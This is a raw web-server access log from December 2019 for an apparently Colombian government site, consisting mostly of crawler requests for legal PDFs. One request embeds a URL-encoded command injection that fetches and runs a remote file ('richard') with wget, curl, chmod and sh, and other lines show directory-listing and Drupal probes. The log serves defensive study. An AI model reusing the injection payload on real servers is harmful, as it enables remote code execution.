69.162.124.232 - - [08/Dec/2019:03:20:43 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [08/Dec/2019:03:21:33 -0500] "GET /BLA/resoluciones/AUTOS%202016/2258.pdf HTTP/1.1" 200 485795
66.249.64.61 - - [08/Dec/2019:03:21:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/6971.pdf HTTP/1.1" 304 -
66.249.64.54 - - [08/Dec/2019:03:22:02 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%202%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 200 1182671
216.244.66.195 - - [08/Dec/2019:03:22:23 -0500] "GET /BLA/resoluciones/AUTOS%202016/2504.pdf HTTP/1.1" 200 552446
192.168.175.104 - - [08/Dec/2019:03:22:27 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [08/Dec/2019:03:23:59 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.61 - - [08/Dec/2019:03:22:32 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 68272
66.249.64.63 - - [08/Dec/2019:03:24:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5529.pdf HTTP/1.1" 200 2801039
216.244.66.195 - - [08/Dec/2019:03:24:44 -0500] "GET /BLA/resoluciones/AUTOS%202016/2786.pdf HTTP/1.1" 200 459748
66.249.64.59 - - [08/Dec/2019:03:24:46 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202014/2848.doc HTTP/1.1" 200 107520
69.162.124.232 - - [08/Dec/2019:03:25:43 -0500] "HEAD / HTTP/1.1" 200 -
46.229.168.136 - - [08/Dec/2019:03:25:50 -0500] "GET /robots.txt HTTP/1.1" 404 1019
46.229.168.129 - - [08/Dec/2019:03:25:51 -0500] "GET /Autoliquidacion/index.php?dir=Solicitudes%2Brelacionadas%2Bcon%2Bocupaci%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%B3n%2Bde%2Bcauce%2F&order=asc&sort=name HTTP/1.1" 200 6862
66.249.64.61 - - [08/Dec/2019:03:26:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/0451.pdf HTTP/1.1" 200 1987451
201.245.192.253 - - [08/Dec/2019:03:26:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29343
216.244.66.195 - - [08/Dec/2019:03:27:04 -0500] "GET /BLA/resoluciones/AUTOS%202016/3169.pdf HTTP/1.1" 200 464794
192.168.175.104 - - [08/Dec/2019:03:27:24 -0500] "GET / HTTP/1.1" 200 9990
208.113.204.14 - - [08/Dec/2019:03:27:28 -0500] "GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F80.82.67.209%2Frichard%3B%20curl%20-O%20http%3A%2F%2F80.82.67.209%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%22%26 HTTP/1.0" 404 1019
66.249.64.59 - - [08/Dec/2019:03:28:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/0526.pdf HTTP/1.1" 200 737779
213.239.216.194 - - [08/Dec/2019:03:28:48 -0500] "GET /robots.txt HTTP/1.1" 404 1015
213.239.216.194 - - [08/Dec/2019:03:28:52 -0500] "GET /PruebasSTORM/?C=D;O=D/ HTTP/1.1" 200 1839
213.239.216.194 - - [08/Dec/2019:03:28:57 -0500] "GET /PruebasSTORM/?C=M;O=A/ HTTP/1.1" 200 1839
192.168.175.104 - - [08/Dec/2019:03:28:57 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:03:28:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6640.pdf HTTP/1.1" 200 417076
213.239.216.194 - - [08/Dec/2019:03:29:03 -0500] "GET /StormSDA/nsjars/?C=N;O=A/ HTTP/1.1" 200 5598
213.239.216.194 - - [08/Dec/2019:03:29:08 -0500] "GET /StormSDA/stormWeb/?C=D;O=D/ HTTP/1.1" 200 1187
54.36.148.255 - - [08/Dec/2019:03:29:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201051-1100/00001083.tif HTTP/1.1" 200 462492
216.244.66.195 - - [08/Dec/2019:03:29:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0113.pdf HTTP/1.1" 200 461270
213.239.216.194 - - [08/Dec/2019:03:29:25 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/88/?C=M;O=A/ HTTP/1.1" 200 873
157.55.39.152 - - [08/Dec/2019:03:29:34 -0500] "GET /robots.txt HTTP/1.1" 404 1049
157.55.39.152 - - [08/Dec/2019:03:29:35 -0500] "GET /robots.txt HTTP/1.1" 404 1049
213.239.216.194 - - [08/Dec/2019:03:29:39 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=D;O=D/ HTTP/1.1" 200 1514
66.249.64.59 - - [08/Dec/2019:03:29:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204225%20DE%202007.pdf HTTP/1.1" 200 256474
213.239.216.194 - - [08/Dec/2019:03:30:06 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=M;O=D/ HTTP/1.1" 200 1514
66.249.64.59 - - [08/Dec/2019:03:30:12 -0500] "GET /Publicaciones/2019EE27108.pdf HTTP/1.1" 404 227
66.249.64.59 - - [08/Dec/2019:03:30:19 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20482%20de%202018.pdf HTTP/1.1" 200 465335
213.239.216.194 - - [08/Dec/2019:03:30:19 -0500] "GET /StormSDA/userFiles%20-%20Copy%2019-07-2012/user_files/formatos/?C=S;O=D/ HTTP/1.1" 200 1514
213.239.216.194 - - [08/Dec/2019:03:30:37 -0500] "GET /StormSDA/userFiles/user_files/86/?C=D;O=D/ HTTP/1.1" 200 813
40.77.167.211 - - [08/Dec/2019:03:30:39 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
69.162.124.232 - - [08/Dec/2019:03:30:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:03:30:46 -0500] "GET /BLA/resoluciones/Autos%202008/2888.pdf HTTP/1.1" 200 102472
213.239.216.194 - - [08/Dec/2019:03:30:56 -0500] "GET /StormSDA/userFiles/user_files/88/?C=N;O=A/ HTTP/1.1" 200 813
66.249.64.59 - - [08/Dec/2019:03:31:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2693.pdf HTTP/1.1" 200 3315894
46.229.168.147 - - [08/Dec/2019:03:31:08 -0500] "GET /Autoliquidacion/index.php?dir=Cobro%2BEvaluacion%2BCertificaci%C3%B3n%2BPara%2BLa%2BDeducci%C3%B3n%2BPor%2BInversi%C3%B3n%2BEn%2BMedio%2BAmbiente%2F&order=desc&sort=name HTTP/1.1" 200 6780
213.239.216.194 - - [08/Dec/2019:03:31:13 -0500] "GET /StormSDA/userFiles/user_files/97/?C=D;O=A/ HTTP/1.1" 200 813
66.249.64.63 - - [08/Dec/2019:03:31:19 -0500] "GET /BLA/resoluciones/AUTOS%202011/1932.pdf HTTP/1.1" 200 151905
213.239.216.194 - - [08/Dec/2019:03:31:28 -0500] "GET /StormSDA/userFiles/user_files/97/?C=M;O=A/ HTTP/1.1" 200 813
157.55.39.149 - - [08/Dec/2019:03:31:29 -0500] "GET /ecodirectorio/files/res/downloads/download_0098.pdf HTTP/1.1" 404 1019
213.239.216.194 - - [08/Dec/2019:03:31:45 -0500] "GET /StormSDA/userFiles/user_files/97/?C=N;O=D/ HTTP/1.1" 200 813
216.244.66.195 - - [08/Dec/2019:03:31:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0609.pdf HTTP/1.1" 200 795264
213.239.216.194 - - [08/Dec/2019:03:32:04 -0500] "GET /StormSDA/userFiles/user_files/97/?C=S;O=A/ HTTP/1.1" 200 813
159.138.150.209 - - [08/Dec/2019:03:32:19 -0500] "GET / HTTP/1.1" 200 9990
213.239.216.194 - - [08/Dec/2019:03:32:20 -0500] "GET /StormSDA/userFiles/user_files/?C=D;O=A/ HTTP/1.1" 200 8984
192.168.175.104 - - [08/Dec/2019:03:32:22 -0500] "GET / HTTP/1.1" 200 9990
54.36.148.227 - - [08/Dec/2019:03:32:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 409459
66.249.64.59 - - [08/Dec/2019:03:32:33 -0500] "GET /BLA/resoluciones/AUTOS%202014/5669.pdf HTTP/1.1" 200 211505
213.239.216.194 - - [08/Dec/2019:03:32:49 -0500] "GET /StormSDA/userFiles/user_files/?C=S;O=A/ HTTP/1.1" 200 8984
213.239.216.194 - - [08/Dec/2019:03:33:07 -0500] "GET /galeria/?C=D;O=D/ HTTP/1.1" 200 3296
213.239.216.194 - - [08/Dec/2019:03:33:23 -0500] "GET /galeria/?C=N;O=A/ HTTP/1.1" 200 3296
213.239.216.194 - - [08/Dec/2019:03:33:37 -0500] "GET /galeria/galeria/?C=S;O=A/ HTTP/1.1" 200 3177
192.168.175.104 - - [08/Dec/2019:03:33:54 -0500] "GET / HTTP/1.0" 200 9990
213.239.216.194 - - [08/Dec/2019:03:33:55 -0500] "GET /galeria/juegos/s/?C=M;O=D/ HTTP/1.1" 200 766
66.249.64.61 - - [08/Dec/2019:03:33:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/6971.pdf HTTP/1.1" 200 637749
216.244.66.195 - - [08/Dec/2019:03:34:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0013.pdf HTTP/1.1" 200 491219
213.239.216.194 - - [08/Dec/2019:03:34:10 -0500] "GET /galeria/juegos/s/?C=S;O=A/ HTTP/1.1" 200 766
213.239.216.194 - - [08/Dec/2019:03:34:26 -0500] "GET /galeria/nivo-slider/?C=D;O=A/ HTTP/1.1" 200 2703
213.239.216.194 - - [08/Dec/2019:03:34:41 -0500] "GET /galeria/nivo-slider/?C=M;O=A/ HTTP/1.1" 200 2703
216.244.66.195 - - [08/Dec/2019:03:34:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0439.pdf HTTP/1.1" 200 770400
213.239.216.194 - - [08/Dec/2019:03:34:57 -0500] "GET /galeria/nivo-slider/?C=N;O=D/ HTTP/1.1" 200 2703
213.239.216.194 - - [08/Dec/2019:03:35:14 -0500] "GET /galeria/nivo-slider/?C=S;O=A/ HTTP/1.1" 200 2703
213.239.216.194 - - [08/Dec/2019:03:35:28 -0500] "GET /galeria/nivo-slider/demo/?C=M;O=D/ HTTP/1.1" 200 6227
69.162.124.232 - - [08/Dec/2019:03:35:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:03:36:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/2967.pdf HTTP/1.1" 200 861208
216.244.66.195 - - [08/Dec/2019:03:36:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0621.pdf HTTP/1.1" 200 520574
201.245.192.253 - - [08/Dec/2019:03:36:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29343
66.249.64.59 - - [08/Dec/2019:03:36:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1559.pdf HTTP/1.1" 304 -
216.244.66.195 - - [08/Dec/2019:03:37:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0719.pdf HTTP/1.1" 200 514667
192.168.175.104 - - [08/Dec/2019:03:37:19 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [08/Dec/2019:03:38:52 -0500] "GET / HTTP/1.0" 200 9990
54.36.148.130 - - [08/Dec/2019:03:39:12 -0500] "GET /robots.txt HTTP/1.1" 404 1049
54.36.150.143 - - [08/Dec/2019:03:40:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%202351-2400/00002371.tif HTTP/1.1" 200 95578
69.162.124.232 - - [08/Dec/2019:03:40:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:03:41:08 -0500] "GET /BLA/resoluciones/AUTOS%202014/4506.pdf HTTP/1.1" 200 550467
157.55.39.149 - - [08/Dec/2019:03:41:14 -0500] "GET /pot-2013/memoria%20justificativa/anexos_2,3,4.pdf HTTP/1.1" 200 617731
45.41.142.211 - - [08/Dec/2019:03:41:30 -0500] "GET / HTTP/1.1" 200 9990
54.36.149.85 - - [08/Dec/2019:03:41:32 -0500] "GET /galeria/galeria/fotos/Pacto_Madera1G.jpg HTTP/1.1" 200 101668
185.187.30.13 - - [08/Dec/2019:03:41:32 -0500] "GET / HTTP/1.1" 200 9990
54.36.149.38 - - [08/Dec/2019:03:41:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201801-1850/20021820.tif HTTP/1.1" 200 82944
66.249.64.59 - - [08/Dec/2019:03:41:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0667.pdf HTTP/1.1" 200 384825
208.100.26.235 - - [08/Dec/2019:03:41:52 -0500] "HEAD /core/misc/drupal.js HTTP/1.1" 404 -
208.100.26.235 - - [08/Dec/2019:03:41:52 -0500] "HEAD /misc/drupal.js HTTP/1.1" 404 -
207.46.13.38 - - [08/Dec/2019:03:42:11 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [08/Dec/2019:03:42:17 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:03:42:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0314.pdf HTTP/1.1" 200 412367
54.36.150.145 - - [08/Dec/2019:03:42:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201951-1971/20021968.tif HTTP/1.1" 200 69944
66.249.64.59 - - [08/Dec/2019:03:43:17 -0500] "GET /BLA/resoluciones/AUTOS%202016/1107.pdf HTTP/1.1" 200 554568
192.168.175.104 - - [08/Dec/2019:03:43:50 -0500] "GET / HTTP/1.0" 200 9990
54.36.149.65 - - [08/Dec/2019:03:43:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%201351-1400/20031359.tif HTTP/1.1" 200 95200
66.249.64.59 - - [08/Dec/2019:03:44:43 -0500] "GET /BLA/resoluciones/AUTOS%202015/0888.pdf HTTP/1.1" 200 465674
186.85.126.217 - - [08/Dec/2019:03:45:27 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.85.126.217 - - [08/Dec/2019:03:45:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.85.126.217 - - [08/Dec/2019:03:45:27 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
69.162.124.232 - - [08/Dec/2019:03:45:43 -0500] "HEAD / HTTP/1.1" 200 -
54.36.150.168 - - [08/Dec/2019:03:46:09 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%201999/&sort=date&order=asc HTTP/1.1" 200 7324
66.249.64.59 - - [08/Dec/2019:03:46:13 -0500] "GET /galeria/nivo-slider/demo/images/Junio%20caminatas.png HTTP/1.1" 304 -
159.138.150.71 - - [08/Dec/2019:03:46:47 -0500] "GET /www.bogota.gov.co/sdqs HTTP/1.1" 404 1047
192.168.175.104 - - [08/Dec/2019:03:47:14 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [08/Dec/2019:03:48:49 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:03:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202008/1262.pdf HTTP/1.1" 200 67751
216.244.66.195 - - [08/Dec/2019:03:49:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1824.pdf HTTP/1.1" 200 501736
216.244.66.195 - - [08/Dec/2019:03:49:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1871.pdf HTTP/1.1" 200 513315
216.244.66.195 - - [08/Dec/2019:03:49:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1971.pdf HTTP/1.1" 200 503124
66.249.64.63 - - [08/Dec/2019:03:49:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2524.pdf HTTP/1.1" 200 448803
66.249.64.61 - - [08/Dec/2019:03:50:27 -0500] "GET /BLA/resoluciones/AUTOS%202008/1632.pdf HTTP/1.1" 200 62132
69.162.124.232 - - [08/Dec/2019:03:50:43 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.210 - - [08/Dec/2019:03:50:57 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/Infografia/Parte2/M-71.png HTTP/1.1" 200 29698
66.249.64.59 - - [08/Dec/2019:03:51:10 -0500] "GET /BLA/resoluciones/AUTOS%202015/3554.pdf HTTP/1.1" 200 828173
66.249.64.59 - - [08/Dec/2019:03:51:53 -0500] "GET /BLA/resoluciones/AUTOS%202012/1482.pdf HTTP/1.1" 200 500327
216.244.66.195 - - [08/Dec/2019:03:52:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2060.pdf HTTP/1.1" 200 514729
192.168.175.104 - - [08/Dec/2019:03:52:13 -0500] "GET / HTTP/1.1" 200 9990
207.46.13.242 - - [08/Dec/2019:03:52:29 -0500] "GET /transparencia/directorioservidores/2017/febrero.xlsx HTTP/1.1" 200 88385
54.36.150.115 - - [08/Dec/2019:03:52:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%202101-2150/20032119.tif HTTP/1.1" 200 270580
216.244.66.195 - - [08/Dec/2019:03:52:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0011.pdf HTTP/1.1" 200 329446
152.61.192.232 - - [08/Dec/2019:03:53:07 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:03:53:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201%20AL%20100/RESOLUCION%200072%20DE%202007.pdf HTTP/1.1" 200 198654
152.61.192.232 - - [08/Dec/2019:03:53:08 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [08/Dec/2019:03:53:29 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [08/Dec/2019:03:53:29 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
192.168.175.104 - - [08/Dec/2019:03:53:47 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:03:54:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/3366.pdf HTTP/1.1" 200 464642
152.61.128.50 - - [08/Dec/2019:03:55:02 -0500] "GET / HTTP/1.1" 200 9990
195.154.123.142 - - [08/Dec/2019:03:55:03 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
195.154.123.142 - - [08/Dec/2019:03:55:03 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
195.154.123.142 - - [08/Dec/2019:03:55:03 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.244.66.195 - - [08/Dec/2019:03:55:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0213.pdf HTTP/1.1" 200 581814
152.61.128.50 - - [08/Dec/2019:03:55:02 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [08/Dec/2019:03:55:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [08/Dec/2019:03:55:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
69.162.124.232 - - [08/Dec/2019:03:55:43 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [08/Dec/2019:03:55:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0461.pdf HTTP/1.1" 200 808902
66.249.64.59 - - [08/Dec/2019:03:56:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0012.pdf HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:03:56:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2962.pdf HTTP/1.1" 200 2929372
192.168.175.104 - - [08/Dec/2019:03:57:11 -0500] "GET / HTTP/1.1" 200 9990
216.244.66.195 - - [08/Dec/2019:03:58:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0956.pdf HTTP/1.1" 200 5455637
66.249.64.59 - - [08/Dec/2019:03:58:19 -0500] "GET /BLA/resoluciones/AUTOS%202014/5338.pdf HTTP/1.1" 200 725194
46.229.168.142 - - [08/Dec/2019:03:58:29 -0500] "GET /robots.txt HTTP/1.1" 404 1019
46.229.168.132 - - [08/Dec/2019:03:58:29 -0500] "GET /Autoliquidacion/index.php?dir=Cobro%2BEvaluacion%2BCertificaci%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%B3n%2BPara%2BLa%2BDeducci%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%B3n%2BPor%2BInversi%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%B3n%2BEn%2BMedio%2BAmbiente%2F&order=asc&sort=name HTTP/1.1" 200 7051
66.249.88.19 - - [08/Dec/2019:03:58:38 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.88.19 - - [08/Dec/2019:03:58:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.88.23 - - [08/Dec/2019:03:58:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
192.168.175.104 - - [08/Dec/2019:03:58:44 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.61 - - [08/Dec/2019:04:00:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0898.pdf HTTP/1.1" 200 376599
216.244.66.195 - - [08/Dec/2019:04:00:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1333.pdf HTTP/1.1" 200 503502
69.162.124.232 - - [08/Dec/2019:04:00:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.104 - - [08/Dec/2019:04:02:09 -0500] "GET / HTTP/1.1" 200 9990
66.249.88.23 - - [08/Dec/2019:04:02:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.88.25 - - [08/Dec/2019:04:02:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.19 - - [08/Dec/2019:04:02:16 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.61 - - [08/Dec/2019:04:02:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0481.pdf HTTP/1.1" 200 529945
216.244.66.195 - - [08/Dec/2019:04:03:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1551.pdf HTTP/1.1" 200 588407
66.249.64.59 - - [08/Dec/2019:04:03:20 -0500] "GET /BLA/resoluciones/AUTOS%202018/0171.pdf HTTP/1.1" 304 -
192.168.175.104 - - [08/Dec/2019:04:03:42 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:04:04:03 -0500] "GET /BLA/resoluciones/AUTOS%202015/1425.pdf HTTP/1.1" 200 568641
13.66.139.0 - - [08/Dec/2019:04:05:18 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
216.244.66.195 - - [08/Dec/2019:04:05:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1781.pdf HTTP/1.1" 200 280994
69.162.124.232 - - [08/Dec/2019:04:05:43 -0500] "HEAD / HTTP/1.1" 200 -
54.36.149.64 - - [08/Dec/2019:04:06:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021461.tif HTTP/1.1" 200 121602
66.249.64.29 - - [08/Dec/2019:04:06:11 -0500] "GET /SIG/ECS/126PM04-PR08.pdf HTTP/1.1" 200 3507449
66.249.64.59 - - [08/Dec/2019:04:06:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201301%20AL%201400/RESOLUCION%201352%20DE%202007.pdf HTTP/1.1" 200 45890
192.168.175.104 - - [08/Dec/2019:04:07:06 -0500] "GET / HTTP/1.1" 200 9990
223.244.152.68 - - [08/Dec/2019:04:07:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2018/&sort=size&order=desc HTTP/1.1" 200 12072
66.249.64.63 - - [08/Dec/2019:04:07:37 -0500] "GET /BLA/resoluciones/AUTOS%202016/1101.pdf HTTP/1.1" 200 204140
216.244.66.195 - - [08/Dec/2019:04:07:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1825.pdf HTTP/1.1" 200 648871
66.249.64.59 - - [08/Dec/2019:04:07:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0346.pdf HTTP/1.1" 200 350390
66.249.64.59 - - [08/Dec/2019:04:08:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204337%20DE%202007.pdf HTTP/1.1" 200 535581
192.168.175.104 - - [08/Dec/2019:04:08:41 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:04:09:03 -0500] "GET /BLA/resoluciones/AUTOS%202010/4687.pdf HTTP/1.1" 200 499183
66.249.64.59 - - [08/Dec/2019:04:09:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204101%20AL%204200/RESOLUCION%204140%20DE%202007.pdf HTTP/1.1" 200 735991
216.244.66.195 - - [08/Dec/2019:04:10:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1947.pdf HTTP/1.1" 200 526178
181.142.54.156 - - [08/Dec/2019:04:10:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.142.54.156 - - [08/Dec/2019:04:10:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.142.54.156 - - [08/Dec/2019:04:10:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
69.162.124.232 - - [08/Dec/2019:04:10:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:04:11:12 -0500] "GET /BLA/resoluciones/AUTOS%202013/0523.pdf HTTP/1.1" 200 1665824
37.192.170.184 - - [08/Dec/2019:04:11:14 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:04:11:55 -0500] "GET /BLA/resoluciones/AUTOS%202008/0659.pdf HTTP/1.1" 200 172671
192.168.175.104 - - [08/Dec/2019:04:12:04 -0500] "GET / HTTP/1.1" 200 9990
216.244.66.195 - - [08/Dec/2019:04:12:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0224.pdf HTTP/1.1" 200 477053
66.249.64.63 - - [08/Dec/2019:04:12:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202501%20AL%202600/RESOLUCION%202553%20DE%202007.pdf HTTP/1.1" 200 1204847
66.249.64.61 - - [08/Dec/2019:04:13:21 -0500] "GET /BLA/resoluciones/AUTOS%202011/5323.pdf HTTP/1.1" 200 603510
46.229.168.134 - - [08/Dec/2019:04:13:28 -0500] "GET /Autoliquidacion/index.php?dir=Cobro%2BEvaluacion%2BCertificaci%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%B3n%2BPara%2BLa%2BDeducci%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%B3n%2BPor%2BInversi%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%B3n%2BEn%2BMedio%2BAmbiente%2F&order=asc&sort=name HTTP/1.1" 200 6907
66.249.64.59 - - [08/Dec/2019:04:13:31 -0500] "GET /BLA/resoluciones/AUTOS%202015/1467.pdf HTTP/1.1" 200 516539
192.168.175.104 - - [08/Dec/2019:04:13:39 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:04:14:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0167.pdf HTTP/1.1" 200 475026
